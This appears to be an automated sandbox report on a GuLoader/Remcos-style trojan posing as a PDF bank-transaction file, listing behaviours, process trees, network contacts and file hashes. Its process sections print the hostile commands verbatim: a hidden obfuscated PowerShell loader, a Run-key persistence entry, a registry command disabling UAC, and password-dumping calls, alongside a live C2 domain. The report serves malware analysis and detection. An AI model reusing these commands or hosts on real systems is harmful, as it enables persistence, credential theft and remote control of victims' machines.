Malware Analysis Report

2024-10-18 23:07

Sample ID 240710-kkm91axfnp
Target pko_trans_details_20240710_105339·pdf.exe
SHA256 d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c
Tags
guloader collection downloader evasion execution persistence trojan
score
10/10


Analysis Overview

score
10/10

SHA256

d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c

Threat Level: Known bad

The file pko_trans_details_20240710_105339·pdf.exe was found to be: Known bad.

Malicious Activity Summary

guloader collection downloader evasion execution persistence trojan

Guloader,Cloudeye

UAC bypass

NirSoft MailPassView

Nirsoft

NirSoft WebBrowserPassView

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Accesses Microsoft Outlook accounts

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Program crash

Enumerates physical storage devices

Unsigned PE

NSIS installer

Modifies registry key

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-07-10 08:39

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win7-20240704-en

Max time kernel

14s

Max time network

19s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win10v2004-20240709-en

Max time kernel

93s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4924 wrote to memory of 3416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4924 wrote to memory of 3416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4924 wrote to memory of 3416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3416 -ip 3416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 644

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win7-20240704-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"

Signatures

Guloader,Cloudeye

downloader guloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2444 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1884 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1884 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1884 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1884 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1884 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1884 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1884 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1884 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2284 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1072 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 1776 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\djnamyferjtolmmslutqajl"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fltsnrpyfrlbvbawufgrkogwrg"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 a458386d9.duckdns.org udp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp

Files

\Users\Admin\AppData\Local\Temp\nso47AB.tmp\nsDialogs.dll

MD5 1c8b2b40c642e8b5a5b3ff102796fb37
SHA1 3245f55afac50f775eb53fd6d14abb7fe523393d
SHA256 8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c
SHA512 4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57

\Users\Admin\AppData\Local\Temp\nso47AB.tmp\BgImage.dll

MD5 521df745a41f0b8164ffd01717cacbba
SHA1 dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74
SHA256 dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b
SHA512 c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe

\Users\Admin\AppData\Local\Temp\nso47AB.tmp\UserInfo.dll

MD5 acbda33dd5700c122e2fe48e3d4351fd
SHA1 2c154baf7c64052ee712b7cdf9c36b7697dd3fc8
SHA256 943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0
SHA512 d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd

C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San

MD5 bf1ebfd1285dd7ef43a587e9f51a8e33
SHA1 1dede4026611e9f40c91d9bbe406a06b2fd8bfa4
SHA256 de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff
SHA512 3b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389

C:\Users\Admin\AppData\Local\kilns\Unobtainably\Polemoniaceae11.Non

MD5 afc1982fff88592a55312010cfc773c6
SHA1 c57e918c5149ca9c2a331a78ecef84ffc667feb7
SHA256 02a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0
SHA512 f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e

C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\ProgramData\remcos\logs.dat

MD5 e607cf77e798eb275450c3cda5efeb1c
SHA1 0b3602942f3d9ad7e1f1ef979ebe589dbc8a8862
SHA256 9751f67592c212d9ec4b500087a13140f1feb12af149c0ccbbed240328d71011
SHA512 59e4cb59341bca7c436eac0e6e471e52dea263d829fc9c498cd9eabdc6808b6f15931b8a6068e32cfc170ea39ddf4f3bdb300ef937f5aedbb419ea5ee77dd411

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win10v2004-20240709-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"

Signatures

Guloader,Cloudeye

downloader guloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 2688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3220 wrote to memory of 2688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3220 wrote to memory of 2688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2688 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2688 wrote to memory of 3920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3220 wrote to memory of 1956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3220 wrote to memory of 1956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3220 wrote to memory of 1956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1956 wrote to memory of 732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1956 wrote to memory of 732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1956 wrote to memory of 732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3220 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 1760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 1760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 1760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 1760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 3700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 3700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 3700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 3700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\dtgxucotnzmfifzebwqmlwxcdtnqyepc"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\nnmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqrivmj"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 85.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 a458386d9.duckdns.org udp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
US 8.8.8.8:53 73.50.76.217.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 213.80.50.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\nsDialogs.dll

MD5 1c8b2b40c642e8b5a5b3ff102796fb37
SHA1 3245f55afac50f775eb53fd6d14abb7fe523393d
SHA256 8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c
